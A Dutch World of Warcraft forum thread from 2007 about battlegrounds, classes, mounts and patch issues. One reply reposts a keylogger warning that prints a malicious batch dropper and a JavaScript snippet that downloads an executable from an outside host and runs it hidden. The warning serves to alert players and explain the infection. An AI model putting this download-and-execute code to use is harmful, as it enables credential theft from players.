Wat je vooral in PuGs ziet is dat een PuG hun start zone uitrent, snel even de stables tagged en dan doorstormt naar de volgende node, waarbij ze geen def achterlaten bij de stables. Wij jatten stables, alliance gaat "ZOMG! get stables back kk plx!", probeert de stables te zergen met z'n allen, en hoppa ze spawnen weer bij hun entrance. Eventjes lekker hun GY campen en er is weer een 5-min potje voorbij :)

Acties:
  • 0 Henk 'm!

• Hican
  • Registratie: December 2001
  • Laatst online: 22-07-2022

Hican

hican.net

shag-me schreef op woensdag 10 januari 2007 @ 12:02:
Ik zou juist TBC kopen als je toch net bent begonnen. Je kan dan mooi 1 van de nieuwe classes kiezen. Aangezien je een pally hebt, zou ik heerlijk voor de Blood Elf Paladin gaan. Erg veel mensen van de 'oude garde' (zoals ik :P) gaan opnieuw beginnen / rerollen naar een draenei of een blood elf. Je zou dan prima mee kunnen komen. Gewoon kopen die TBC :)

Edit: bah, Thijs was me al voor :)

Hican.net | IT Blog about all that is interesting.

Acties:
  • 0 Henk 'm!

• Hydra
Verwijderd schreef op woensdag 10 januari 2007 @ 12:29:
Hordes hebben toch een broertje dood aan Bubbleboys? :+
Omdat het een ERG irritante class is om tegen te vechten. Alliance zal snel merken hoe vervelend paladins precies zijn in de BGs :)

Acties:
  • 0 Henk 'm!

• Hican

Hican

hican.net

Hydra schreef op woensdag 10 januari 2007 @ 12:30:
[...]

In AB en WSG zijn er geen grote voordelen aan beide zijden. Ik doe eigenlijk vooral AB in een premade, en we merken gewoon dat alliance enorm dom speelt. De enige keer dat we verloren hebben was tegen een andere tier 2/3 premade met 8 paladins in de groep. Daar kun je gewoon niet tegenop DPSen. En toen hadden ze nog maar 3 bases.

Zuigt wel. Krijg je 100 honour voor een potje van 25 minuten in plaats van 200 voor een potje van 5 ;)

Wat je vooral in PuGs ziet is dat een PuG hun start zone uitrent, snel even de stables tagged en dan doorstormt naar de volgende node, waarbij ze geen def achterlaten bij de stables. Wij jatten stables, alliance gaat "ZOMG! get stables back kk plx!", probeert de stables te zergen met z'n allen, en hoppa ze spawnen weer bij hun entrance. Eventjes lekker hun GY campen en er is weer een 5-min potje voorbij :)
PUGs zijn vrijwel altijd klote en helemaal aan de kant van onze josties... de alliance :) in TBC ga ik ook heerlijk switchen naar de horde kant met een lief blood elfje, ik ben de alliance nu wel aardig zat :P

Acties:
  • 0 Henk 'm!

• redfoxert
  • Niet online
Viggen schreef op woensdag 10 januari 2007 @ 12:26:
[...]

Swift Purple Hawkstrider
Binds when picked up
Races: Or, Sc, Tr, Be
Requires Level 60
Requires Riding (150)

wel orc, geen tauren dus

plaatjes zijn te vinden @ http://www.wowwiki.com/Hawkstrider (voor de geïnteresseerden :P)
Sc ? Staat dat voor Scourge aka Undead ?

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
Hican schreef op woensdag 10 januari 2007 @ 12:33:
[...]

PUGs zijn vrijwel altijd klote en helemaal aan de kant van onze josties... de alliance :) in TBC ga ik ook heerlijk switchen naar de horde kant met een lief blood elfje, ik ben de alliance nu wel aardig zat :P
mja, wat me opviel was dat we tijdens 't AB-weekend als alliance zijnde wel ineens veel konden winnen :P (pug vs pug wederom)

Acties:
  • 0 Henk 'm!

Verwijderd

[...]

Doe ik ook ;)\

Een tauren lijkt me niet

-edit-

Ik heb gisteren een beetje zitten kijken en heb nog geen idee wat ik precies moet doen en waar , wat moet ik precies verzamelen en waar in AV moet ik die dingen inleveren , mischien een naam van een NPC ofzoiets, bedankt!

Acties:
  • 0 Henk 'm!

• SnoeiKoei
  • Laatst online: 19:52

SnoeiKoei

Koeien Snoeien Loeiend!

Kun je meerdere lvl40 mounts bezitten? Als warlock krijg ik met lvl40 een gratiz fel steed met bijbehorende riding skill, maar als gnome kan ik voor een mechanostrider gaan (en zowel voor de strider als voor de skill betalen). Vervalt bij keuze voor t ene ros het recht op t andere? Of kan ik ze allebei hebben? Dan zou ik een fel steed kunnen halen, gratis riding skill, en daarna alsnog betalen voor de strider?

SuBBaSS: "SnoeiKoei, de topic-Freek"

Acties:
  • 0 Henk 'm!

• Yokozuna
Je kunt zoveel mounts kopen als je wilt, ook als warlock.

Er zijn al mensen die een normale epic mount hebben + alle 4 de warmounts :)
Omdat het een ERG irritante class is om tegen te vechten. Alliance zal snel merken hoe vervelend paladins precies zijn in de BGs
Inderdaad. Het is me ook al twee keer overkomen dat we tegen een WSG team van 9 paladins moesten spelen, dat it werkelijk bijna niet te doen.

[ Voor 64% gewijzigd door Yokozuna op 10-01-2007 12:38 ]

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
SnoeiKoei schreef op woensdag 10 januari 2007 @ 12:35:
Kun je meerdere lvl40 mounts bezitten? Als warlock krijg ik met lvl40 een gratiz fel steed met bijbehorende riding skill, maar als gnome kan ik voor een mechanostrider gaan (en zowel voor de strider als voor de skill betalen). Vervalt bij keuze voor t ene ros het recht op t andere? Of kan ik ze allebei hebben? Dan zou ik een fel steed kunnen halen, gratis riding skill, en daarna alsnog betalen voor de strider?
je kunt zoveel mounts halen als je zelf wilt :P

heb op m'n pala ook free mount + normaal paardje :)

je krijgt bij je gratis mount de bijbehorende skill (75 in dit geval) en dan kun je goedkoop een 2e mount erbij kopen :)

Acties:
  • 0 Henk 'm!

• OkkE
  • Registratie: Oktober 2000
  • Laatst online: 04-09 08:16

OkkE

CSS influencer :+

Thijs schreef op woensdag 10 januari 2007 @ 12:23:
[...]

Je hebt toch ook 2 nieuwe professions in TBC, die je alleen kunt doen als je TBC hebt? En er is toch zoiets als Edelstenen op wapens, wat waarschijnlijk ook alleen kan als je TBC hebt? Dat lijkt me ook wel content voor <60.. :)

“The best way to get the right answer on the Internet is not to ask a question, it's to post the wrong answer.”
QA Engineer walks into a bar. Orders a beer. Orders 0 beers. Orders 999999999 beers. Orders a lizard. Orders -1 beers.

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 10 januari 2007 @ 12:35:
[...]

Ik heb gisteren een beetje zitten kijken en heb nog geen idee wat ik precies moet doen en waar , wat moet ik precies verzamelen en waar in AV moet ik die dingen inleveren , mischien een naam van een NPC ofzoiets, bedankt!
Ik weet de namen ook niet van de ncp's.
Ben nog niet zo ervaren met AV ;)
Misschien zijn er wel meer spots in av waar je kan inleveren.
SnoeiKoei schreef op woensdag 10 januari 2007 @ 12:35:
Me broertje is ook warlock.
De level 75 skill riding kreeg ie gratis en de fel steed.

Daarnaast heeft hij nog een gewone undead paard gekocht voor 8 of 9 g

Je kan gewoon meerdere mounts hebben, als de servers straks werken moet je gewoon ff bij je mount dealer kijken

[ Voor 5% gewijzigd door Verwijderd op 10-01-2007 12:39 ]

Acties:
  • 0 Henk 'm!

• thalantis
  • Registratie: Augustus 1999
  • Laatst online: 26-01-2023

thalantis

12200 Wp

waar is die nieuwe totem (totemic call) gebleven voor shamans, stond eerst wel in de patch notes

Jsunnyreports

Acties:
  • 0 Henk 'm!

• redfoxert
  • Niet online
Verwijderd schreef op woensdag 10 januari 2007 @ 12:35:
[...]

Voor horde weet ik het wel

1. Armor Scraps bij de Blacksmith bij zn Forge in Frostwolf camp (onbeperkt)
2. Blood in de grot bij de Primalist (200 tot ze gaat rennen om de Icelord te summonen)
3. Alle soorten Flesh boven bij de Wing Commanders wanneer ze zijn released en veilig teruggekeerd. (ong 90 voordat hij/zij opstijgt). Deze komen tegenover de Frostwolf Keep te staan naar de East Tower.

Acties:
  • 0 Henk 'm!

• Hican

Hican

hican.net

Viggen schreef op woensdag 10 januari 2007 @ 12:35:
[...]

mja, wat me opviel was dat we tijdens 't AB-weekend als alliance zijnde wel ineens veel konden winnen :P (pug vs pug wederom)
pug tegen pug is nog wel leuk :P maar meestal eindig ik tegen een premade, dus vandaar dat ik ook alleen nog maar premades doe met de guild, maar ja, niet iedereen is er altijd >< :) anyways, ik ga toch overstappen op een Blood Elfje, dus dan gaan we de guild weer opnieuw inrichten / opzetten. Heerlijk vanaf het begin op een vers servertje. Good old days :)

Acties:
  • 0 Henk 'm!

• witchdoc
Yokozuna schreef op woensdag 10 januari 2007 @ 12:18:
[...]

Je info is niet compleet. De attack speed normalisation geldt alleen voor attack power. Attack power komt nergens aan bod in je post. Bovendien geldt de normalisation ook voor maces en fist weapons (ook 2.4speed), jij zei alleen daggers+swords.
Had het AP gedeelte uit je vorige pmost niet opgemerkt. Thanks voor de verbetering. Dit wist ik helemaal niet zelfs (nooit de wiskunde gedaan) :)

Acties:
  • 0 Henk 'm!

• porn*
  • Laatst online: 10-09 15:34
Hydra schreef op woensdag 10 januari 2007 @ 12:07:
Haal iets van 8k op een zaterdag, 2500 als ik alleen 's avonds PvP. Dan vind ik de PvP rewards nog best 'goedkoop' eigenlijk als je ziet hoe lang je moet raiden voor een tier 2 set.

[...]

25 minuten :) Tenzij je veel nodes verliest steeds, dan duurt het nog langer. 4-1 is ongeveer 15 minuten. 5-0 duurt minimaal 5 minuten, sneller dan dat kan geloof ik niet. Maar van die 5 minuten moet je wel de 2 min warming-up vanaf trekken, eigenlijk pwn je dan gewoon de tegenstander in 3 min :)
Ik haal ook zo'n 2-3k als ik een avondje speel, 2.5-3.5 uurtjes ongv. Het is inderdaad goedkoop dat ben ik met je eens, maar van de andere kant moet je de items ook als "tussendoortjes" zien die je na een aantal lvls vervangt. Als je 't zo bekijkt mag 't van mij wel ietsje goedkoper.

Als je 4-1 of 5-0 wint krijg je toch ook een stuk minder honor dan een wat langere pot 3-2 winnen?

Bnet pindle#2913

Acties:
  • 0 Henk 'm!

Verwijderd

thalantis schreef op woensdag 10 januari 2007 @ 12:39:
waar is die nieuwe totem (totemic call) gebleven voor shamans, stond eerst wel in de patch notes
ja idd :/ mja zal wel met TBC komen dat is over 6 dagen ;) hij scheen ook bugged te zijn ofzo hadk gelezen dat het 25% van jouw mana nam xD

[ Voor 43% gewijzigd door Verwijderd op 10-01-2007 12:49 ]

Acties:
  • 0 Henk 'm!

Verwijderd

redfoxert schreef op woensdag 10 januari 2007 @ 12:43:
[...]

Voor horde weet ik het wel

1. Armor Scraps bij de Blacksmith bij zn Forge in Frostwolf camp (onbeperkt)
2. Blood in de grot bij de Primalist (200 tot ze gaat rennen om de Icelord te summonen)
3. Alle soorten Flesh boven bij de Wing Commanders wanneer ze zijn released en veilig teruggekeerd. (ong 90 voordat hij/zij opstijgt). Deze komen tegenover de Frostwolf Keep te staan naar de East Tower.
Dankje voor de info, vanavond eens rondrennen in AV, kijken hoever ik kom :)

Acties:
  • 0 Henk 'm!

• Keesr
  • Registratie: Juni 2002
  • Laatst online: 15-08-2017
Hydra schreef op woensdag 10 januari 2007 @ 12:32:
[...]

Omdat het een ERG irritante class is om tegen te vechten. Alliance zal snel merken hoe vervelend paladins precies zijn in de BGs :)
Ik weet er alles van ;)

Heb 2 characters op alliance en ik merk nu dat ik maar al te blij mag zijn dat ik paladins aan mijn kant heb! Zat gister wat pvp te doen op me ud priest en ik kwam toen in een wsg met 4 paladins, sta je daar je mana te nuken op dots die paar seconden later weer vrolijk dispelld worden 8)7

Mensen zitten altijd te klagen over shamans, maar die paladins zijn werkelijk 10x erger :9

Death is nothing; but to live defeated and without glory is to die every day - Emperor Napoleon I

Acties:
  • 0 Henk 'm!

• Hican

Hican

hican.net

porn* schreef op woensdag 10 januari 2007 @ 12:44:
[...]

Ik haal ook zo'n 2-3k als ik een avondje speel, 2.5-3.5 uurtjes ongv. Het is inderdaad goedkoop dat ben ik met je eens, maar van de andere kant moet je de items ook als "tussendoortjes" zien die je na een aantal lvls vervangt. Als je 't zo bekijkt mag 't van mij wel ietsje goedkoper.

Als je 4-1 of 5-0 wint krijg je toch ook een stuk minder honor dan een wat langere pot 3-2 winnen?
Als je AB wint met 5 bases in je bezit, dan krijg je dikke bonus honor. Het slimst is om altijd zo snel mogelijk te winnen met 5 bases :) oftewel, premades van 15 man en dan iedere 3 mins met 2000-0 winnen met 5 bases in je bezit (duh met 2000-0) en dat in een AB weekend. Ik denk dat je met een uurtje of wat je hele Field Marshal set bij elkaar hebt :P

Acties:
  • 0 Henk 'm!

• Hican

Hican

hican.net

Keesr schreef op woensdag 10 januari 2007 @ 12:47:
[...]

Ik weet er alles van ;)

Heb 2 characters op alliance en ik merk nu dat ik maar al te blij mag zijn dat ik paladins aan mijn kant heb! Zat gister wat pvp te doen op me ud priest en ik kwam toen in een wsg met 4 paladins, sta je daar je mana te nuken op dots die paar seconden later weer vrolijk dispelld worden 8)7

Mensen zitten altijd te klagen over shamans, maar die paladins zijn werkelijk 10x erger :9
Als priest zijnde moet je paladins ook niet gaan nuken :) gewoon shieldje op en heel even een seconden of 10 mana drainen en dan op je gemak eens wat mind blasten en met je wand aan de gang :) (geen dots, aangezien alles dispelled word).

Acties:
  • 0 Henk 'm!

Verwijderd

porn* schreef op woensdag 10 januari 2007 @ 12:44:
[...]

Tijdens het honor weekend kreeg je 241 honor per gewonnen potje
In de score zag je 201 staan, in je combatlog stond nog 40 honor erbij
Hk's niet meegerekent

Ik heb na ongeveer 30 uur gespeeld te hebben dit weekend ruim 40k honor gefarmed, oke ik zat dan ook wel in een goeie premade op Horde Kazzak :)
Voorlopig geen honor farmen dus :)

[ Voor 3% gewijzigd door Verwijderd op 10-01-2007 12:50 ]

Acties:
  • 0 Henk 'm!

Verwijderd

[...]

Blijkbaar, want volgens jouw beredenering, die ik overigens wel geloof, heb ik me wapens omgekeerd :P . maarja, ik heb maar 1 dagger en 1 sword. En ik moet de dagger wel in me main hebben voor backstabs enzo, maargoed, dalijk anders maar even omdraaien als dat echt beter is.

Ik bedoel, zonder backstab heb ik me heel goed kunnen redden ook dus :)

edit:

maar bedankt voor je heldere uitleg. Dit kopieer ik even zodat ik het altijd bij de hand heb }:O

Acties:
  • 0 Henk 'm!

• HTT-Thalan
  • Laatst online: 20:53

HTT-Thalan

technically, I'm not pedantic.

Ik las zojuist in de patch notes dat rogue talenten weer gereset zijn, en weer iets gewijzigd. Ik kan nog niet op WoW-Europe komen, Vashj is down, en Thott is nog niet bijgewerkt.

Zijn er al sites waar ik deze hagelnieuwe talent trees kan bekijken om testspecs te maken?

Acties:
  • 0 Henk 'm!

• Smultie
  • Niet online
www.wowhead.com is altijd wel goed bijgewerkt

Acties:
  • 0 Henk 'm!

• MantaMania
  • Registratie: November 2004
  • Laatst online: 01-05-2024

MantaMania

Pray Hard

Hican schreef op woensdag 10 januari 2007 @ 12:49:
[...]

Als priest zijnde moet je paladins ook niet gaan nuken :) gewoon shieldje op en heel even een seconden of 10 mana drainen en dan op je gemak eens wat mind blasten en met je wand aan de gang :) (geen dots, aangezien alles dispelled word).
of je lvl 1 dot erop de meeste hebben het nooit door ;)

Acties:
  • 0 Henk 'm!

Verwijderd

Zijn de pet attack speeds van hunter nu ook naar 2.0 gegaan?
of komt dat met de BC pas?

-edit-

Dat blizzard downloader gaat echt traag

[ Voor 23% gewijzigd door Verwijderd op 10-01-2007 13:11 ]

Acties:
  • 0 Henk 'm!

• BootVluchteling
  • Registratie: Juli 2002
  • Laatst online: 29-08 19:41
Verwijderd schreef op woensdag 10 januari 2007 @ 13:11:

-edit-

http://www.wowwiki.com/Patch_mirrors

Acties:
  • 0 Henk 'm!

• Slamdance
  • Laatst online: 12-09 13:19
Verwijderd schreef op woensdag 10 januari 2007 @ 13:11:

-edit-

Ja op de testrealm hebben mijn broken tooth (1.0) en deathmaw (1.2) een attackspeed van 2 sec
dus nu kan ik mijn broken tooth wel wegdoen, die ziet er toch niet uit, maar heb ik ig wel weer een stableslot over om de nieuwe talents etc te gaan leren :)

Nu nog wachten op de skin en model normalization, persoonlijk hoop ik op een grijze steen als pet.

Acties:
  • 0 Henk 'm!

• BootVluchteling
  • Registratie: Juli 2002
  • Laatst online: 29-08 19:41
Slamdance schreef op woensdag 10 januari 2007 @ 13:21:
[...]

Ja op de testrealm hebben mijn broken tooth (1.0) en deathmaw (1.2) een attackspeed van 2 sec
dus nu kan ik mijn broken tooth wel wegdoen, die ziet er toch niet uit, maar heb ik ig wel weer een stableslot over om de nieuwe talents etc te gaan leren :)

Nu nog wachten op de skin en model normalization, persoonlijk hoop ik op een grijze steen als pet.
ik heb broken tooth ook.. ik houd em lekker. vind het zonde om em weer weg te doen na de moeite die hij gekost heeft...

Acties:
  • 0 Henk 'm!

• Slamdance
  • Laatst online: 12-09 13:19
True, maar het lvlen heeft me wel genoeg geld opgelevert :P

Maar ik heb ook nog Shy-Rotam in mijn stable zitten, als ik dan moet kiezen tussen die 2 cats wint Shy-Rotam het. (ook al loopt iedereen daar al mee rond bijna)
Deathmaw hou ik wel voorlopig, die heeft me voral veel tijd gekost om te vinden.
broken tooth zie ik regelmatig in wow, deathmaw ben ik nog maar 2 keer tegen gekomen ooit.

Acties:
  • 0 Henk 'm!

• Morrar
  • Registratie: Juni 2002
  • Laatst online: 18:57
En ja 2.0 attack speed voor pets :-(

Edit: te laat O-)

[ Voor 23% gewijzigd door Morrar op 10-01-2007 13:30 ]

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
hmmm, gezellige event bij dark portal... :P

heb iig weer een tabard erbij ^^

Acties:
  • 0 Henk 'm!

Verwijderd

Acties:
  • 0 Henk 'm!

• Kevinp
Morrar schreef op woensdag 10 januari 2007 @ 13:30:
En ja 2.0 attack speed voor pets :-(

Edit: te laat O-)
Ik vind dit (als niet hunter) wel flauw van blizzard. Al zouden ze wel wat aan sommige pets moeten doen, maar dit is gewoon alles hetzelfde maken.

Geef mijn warrior shield, renew regroth, en innervate en geef priest plate en dan is het allemaal hetzelfde.

Wat ik nog steeds vind is dat een hunter die zijn pets kwakkeloos wegstuurd(zeker irri in pvp) een debuff moeten krijgen als hun pet dood gaat(bv 1 minuut 50% ranged attack speed). En dat dan alleen als de pet 10y van de hunter is ofzo(niet dat mensen die gaan doornuken).

Acties:
  • 0 Henk 'm!

• RaDKiLL
  • Registratie: Mei 2001
  • Laatst online: 26-03-2023

RaDKiLL

Revived

Isser al bekend of de adons zoals ze nu zijn ook werken met de zojuist uitgebrachte patch?

"Ik huiver de fluister, daarom schreeuw ik!"

Acties:
  • 0 Henk 'm!

• OkkE
  • Registratie: Oktober 2000
  • Laatst online: 04-09 08:16

OkkE

CSS influencer :+

Ik moet zeggen dat ik het - als niet Hunter - ook wel erg jammer vind. Het is juist een extra beloning als je zo veel moeite doet om een bepaalde pet te krijgen. Misschien waren sommige pets wel erg sterk, maar om ze nu gelijk allemaal het zelfde te maken? Nee. Nu gaat het alleen nog maar om de looks, dat is jammer.

“The best way to get the right answer on the Internet is not to ask a question, it's to post the wrong answer.”
QA Engineer walks into a bar. Orders a beer. Orders 0 beers. Orders 999999999 beers. Orders a lizard. Orders -1 beers.

Acties:
  • 0 Henk 'm!

Verwijderd

Als ik probeer in te loggen krijg ik deze msg:

Unable to validate client version, This may be caused by file corruption or the interface of another program.

Is dit omdat er mainternance is, want gister deed ie het nog gewoon..

ik gebruik 2.0.1 (6180) (release) , want ik weet niet hoe je moet patchen met die .MPQ files ofzo.. :'(

[ Voor 11% gewijzigd door Verwijderd op 10-01-2007 13:42 ]

Acties:
  • 0 Henk 'm!

• Smultie
  • Niet online
Kevinp schreef op woensdag 10 januari 2007 @ 13:34:
[...]

Geef mijn warrior shield, renew regroth, en innervate en geef priest plate en dan is het allemaal hetzelfde.
Zomg! Een shield kan je al equippen en innervate heb je niks aan omdat je geen mana hebt!
Echt, l2p

^^

Acties:
  • 0 Henk 'm!

Verwijderd

Verwijderd schreef op woensdag 10 januari 2007 @ 13:42:

Unable to validate client version, This may be caused by file corruption or the interface of another program.

ik gebruik 2.0.1 (6180) (release) , want ik weet niet hoe je moet patchen met die .MPQ files ofzo.. :'(
Ik heb een paar weken geleden hetzelfde gehad en ik bleek keyloggers te hebben van cursed-gaming en nog een andere site. Het kan volgens mij ook met de patch en het nog niet helemaal lekker lopen van de servers te maken hebben maar dat was in mijn geval dus niet zo.

Ik heb toen format C: gedaan en de hele meuk opnieuw geinstalleerd alsmede betere anti-virus en anti-spyware software.

In een van de vorige wow-topics is hier het een en ander van voorbij gekomen, ik zal het even voor je opzoeken.

Gevonden:
Account Security Warning: Addon Websites infected with keyloggers

Numerous threads have been popping up over the last couple of days about keyloggers embeded in Add-ons on Curse-gaming.com and worldofwar.net., lots of players got their account stolen. They have been detected in Addons and other parts of those two websites, according to users's testimony on boards.

For players who dont know, what's a keylogger and how dangerous it is for your WoW account, I will do a quick decription:
• Keyloggers record what you fill in at your account name and password and then send those data to the maker of the script. Therefore you will lose your account, since somebody else know your account and password information.

How to check if you are infected:

• If you have a file named ntldr.exe (EXE, not dll, the dll is used by your OS to boot your computer). That file is the keylogger and you should remove it asap.
• If you have the file \Windows\System32\algetgleyus.exe DELETE IT! Then open regedit.exe and go to \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and DELETE the key systwyei (this is what starts the executable each time). ONLY REMOVE THOSE TWO ITEMS.

How to protect yourself:

• Dont use Internet Explorer (It hasnt been confirmed that IE 7.0 was safe yet), instead download and start using Mozilla Firefox.
*Fore more security, since WoW targeted keyloggers use java in their process to infect you, you can block or allow java-script with the no-script add-on for firefox, It disables java on default and let you enable it on choice (for trusted websites).*

Where:

• WorldofWar.net: At this time, there is a keylogger embedded into the ui.worldofwar.net homepage. The keylogger itself is in an iframe embedded from hxxp://ui.bcegame.com/pps.exe (do not visit!).

• Curse-gaming.com: The curse-gaming keylogger is on media1.curse-gaming.com. If you go to their beta patch notes page from their site, everything's clean, but if you go to the one listed above, it's got the keylogger on it. (Source)

Source, testimony and more detailed infos:

• WorldofRaids: http://www.worldofraids.com/forum/viewtopic.php?t=2487
• Blizzard forums: http://forums.worldofwarc...opicId=58796664&sid=1
• IGN: http://vnboards.ign.com/w...s/b22782/100532144/p1/?13

(copypaste van www.worldofraids.com)

--------------------------------------------------------------------------------

-edit-
Meer info (van worldofraids.com forums):

Some new info:
The curse-gaming keylogger isn't *EXACTLY* on curse-gaming.com, it's on media1.curse-gaming.com. If you go to their beta patch notes page from their site, everything's clean, but if you go to the one listed above, it's got the keylogger on it.

the curse-gaming .exe contains this (Courtesy of Borong from Final Ascension):
quote:
boy this was a project.. so 47-22782-ollydbg-ollydbg.exe was written in simple Chinese which when executed does 3 things:

1. unpacks some files to a temp dir
2. creates a VB script
3. runs the VB script

Here's the vbscript:
code:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
@Echo Off¡¡¡¡
Set date=%date%
date 1987-12-18
@Echo Off & setlocal enableextensions
Echo WScript.Sleep 1000 > WOWLog.vbs
Set /a i = 10
:Timeout
If %i% == 0 Goto Next
setlocal
Set /a i = %i% - 1
cscript //nologo WOWLog.vbs
Goto Timeout
Goto End
:Next
Interfaces.exe
date %date%
Del Interfaces.exe
Del Setup_interfacer.exe
Del WOWLog.vbs
Del Setup.exe

So the interfaces.exe file seems to be the one that setups a resident file that loves to load itself into your systems memory. The process I believe is called algetgleyus.exe but no file by that name exists on disk. So thats pretty much where I am at now. All in all a fun little exercise for me doing some stuff I haven't done in awhile.

Edit 1: Oh yeah and the setup_~1.exe file created by ollydbg was written in Russian.. so yeah Chinese and Russian two languages I am really proficient in when trying to disassemble code and figure it out.

Edit 2: Doh.. I am a moron! algetgleyus.exe lives in \Windows\System32 and by default is a hidden, read-only file.

Edit 3: HOW TO CHECK IF YOU ARE INFECTED!!!!

If you have the file \Windows\System32\algetgleyus.exe DELETE IT!

Open regedit.exe and go to \HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and DELETE the key systwyei (this is what starts the executable each time)

ONLY REMOVE THOSE TWO ITEMS.

--------------------------------------------------------------------------------

And from him about the WorldofWar one:
quote:
Borong wrote:
Ok so for the ui.wow one (file called pps.exe) here's what the script inside the embedded iframe really looks like (i didn't decode it.. found it on the forums)
code:
1
2
3
4
5
6
7
8
9
xPost.Open('GET','httxxxp://ui.bcegame.com/pps.exe',0);
xPost.Send();
var sGet=df.CreateObject('ADODB.Stream','');
sGet.Mode=3;
sGet.Type=1;
sGet.Open();
sGet.Write(xPost.ResponseBody);
sGet.SaveToFile('c:/ntldr.exe',2);
var x = df.CreateObject('wscript.shell','');
x.run('c:/ntldr.exe',0);

So that one d/l's the pps.exe file, saves it to a file called "c:/ntldr.exe" which is COMPLETELY AND UTTERLY DIFFERENT than "c:\ntldr.dll" which YOU MUST HAVE TO LOAD WINDOWS!

Anyway.. I should be getting back to actual work so I can get out of here soon.

I wonder how many of you actually read this crap. Laughing
Alles wat in onderstaande replies aangegeven word is ook goed mogelijk maar ik zou voor de zekerheid maar even controleren op keyloggers...

[ Voor 78% gewijzigd door Verwijderd op 10-01-2007 14:02 ]

Acties:
  • 0 Henk 'm!

Verwijderd

Viggen schreef op woensdag 10 januari 2007 @ 13:32:
hmmm, gezellige event bij dark portal... :P

heb iig weer een tabard erbij ^^
Vertel, zit op mn werk en kan vanavond pas weer inloggen :)
Wat voor event is daar aan de hand nu :) ?

Acties:
  • 0 Henk 'm!

• Kevinp
SMulTiE schreef op woensdag 10 januari 2007 @ 13:46:
[...]

Zomg! Een shield kan je al equippen en innervate heb je niks aan omdat je geen mana hebt!
Echt, l2p

^^
ik bedoelde zo'n pally en/of priest shield. En innervate die 10 rage every 5 sec genereerd is ook leuk. Wat ik wilde zeggen is dat die pets allemaal hetzelfde worden, wat ik gewoon jammer vind.

Acties:
  • 0 Henk 'm!

• Viggen
  • Niet online
Verwijderd schreef op woensdag 10 januari 2007 @ 13:49:
[...]

Vertel, zit op mn werk en kan vanavond pas weer inloggen :)
Wat voor event is daar aan de hand nu :) ?
mja komen wat demons door de portal en die kun je neerzergen door flink te aoe'en... en dan kun je tabard krijgen :)

begint alleen meer op een gankfest te lijken nu bij ons :P

Acties:
  • 0 Henk 'm!

• Hican

Hican

hican.net

Heb ik ook gehad, en overigens nog steeds :) wat voor mij werkte was wow.exe kopieeren en die renamen naar worldofwarcraft.exe. Dubbelklik op worldofwarcraft.exe en logt u maar weer in :P

Acties:
  • 0 Henk 'm!

• Hican

Hican

hican.net

Kevinp schreef op woensdag 10 januari 2007 @ 13:51:
[...]

ik bedoelde zo'n pally en/of priest shield. En innervate die 10 rage every 5 sec genereerd is ook leuk. Wat ik wilde zeggen is dat die pets allemaal hetzelfde worden, wat ik gewoon jammer vind.
Die skill heeft een warrior al en wel in de Arms tree, genaamd: Second Wind :) Heeeeerlijke skill.

Acties:
  • 0 Henk 'm!

• redfoxert
  • Niet online

Patch files downloaden, in een folder genaamd Patches in je WoW folder zetten en je background downloader aanzwengelen. Die checkt de files op juistheid en zou dan de boel moeten installeren.

Acties:
  • 0 Henk 'm!

• Kapoen
  • Registratie: Mei 2002
  • Laatst online: 17:51
MrVegeta schreef op woensdag 10 januari 2007 @ 11:53:
[...]

Op Kor'gall duurt AV meestal een 20tal minuten en Horde wint 99%, met een hele rits aan lieutenants en captains die mee plat gaan. Ik heb dan ook voor mijn undead mage gewoon via deze manier een epic mount bij elkaar gespaard. Tot 2x toe heb ik ook het 'geluk' gehad dat ik de tunnel van Frostwolf nog niet uit was en dat ik een score bord gepresenteerd kreeg + 3 winning tokens :)

Ook een aantal keren meegemaakt dat ik rustig naar Vandarr kon rijden zonder 1 alliance speler tegen te komen :? Op deze manier heb ik dus toch redelijk snel honour gekregen (die ik niet nodig heb omdat ik mijn mage via PvE wil equippen, het ging mij alleen om de mount).

En we hebben het risico maar genomen om te pre-orderen bij bol.com omdat ik 16, 17 en 18 januari lange shiften moet kloppen en ik dus niet in een winkel geraak |:( Hopelijk wordt de Belgische klant even vlot bedient :)

[ Voor 9% gewijzigd door Kapoen op 10-01-2007 14:04 ]

Clowns to the left of me, Jokers to the right

Acties:
  • 0 Henk 'm!

Verwijderd

Slamdance schreef op woensdag 10 januari 2007 @ 13:26:

Maar ik heb ook nog Shy-Rotam in mijn stable zitten, als ik dan moet kiezen tussen die 2 cats wint Shy-Rotam het. (ook al loopt iedereen daar al mee rond bijna)
Een guildie van me heeft Sian-Rotam, de grote broer van Shy-Rotam. Dat is een leeuw met dezelfde looks als the Rake, maar dan spierwit met zilveren manen. echt TE mooi gewoon.
Geloof dat hij de enige aan, iig, de alliance side is op zenedar met die pet.
Die spawned pas als je Shy-Rotam bijna dood hebt.

Acties:
  • 0 Henk 'm!

• Hydra
Hican schreef op woensdag 10 januari 2007 @ 12:33:
Ik vermaak me ook opperbest op m'n Undead Mage ;)

Pagina: 1 ... 9 ... 12 Laatste

Dit topic is gesloten.